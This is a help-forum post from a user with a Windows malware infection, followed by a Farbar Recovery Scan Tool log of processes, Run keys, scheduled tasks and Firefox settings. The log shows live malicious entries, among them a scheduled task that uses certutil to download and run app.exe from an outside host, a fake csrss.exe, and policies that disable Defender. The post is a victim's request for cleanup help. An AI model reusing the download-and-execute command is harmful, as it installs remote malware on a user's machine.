After a suspicious download windows defender found some threats. I let it clean them and rebooted. Upon rebooting the defender found them again and I removed them again. The next time it did not ask to remove anything and showed the removed threats. I attempted to run Malwarebytes but each time I try I get a message saying "Windows cannot access the specified device, path or file. You may have not access...". Which is also a new thing caused obviously by the infection. The next (new) problem is that in my installed programs list I see one called Cloudnet, which was installed today unintentionally. When I click to uninstall it a dos window appears with some Russian(?) characters which I cannot understand. If I click Enter the window goes away but the program remains installed. The other symptom is that whatever is installed, it opens Firefox windows every few minutes. I am not sure that I have understood your instructions about attaching files, Is it attaching thise 2 files or copy-pasting the texts here? So I think I will do both, This is partly because the connection is not so good right now and I am having a hard time to communicate with you properly. For example the first times I tried to write this text, there was no text box to write onto. It appeared just some minutes ago after a few attempts to reload the page and finally I can write this to you. Thank you in advance for any help.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe
() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.Ã r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
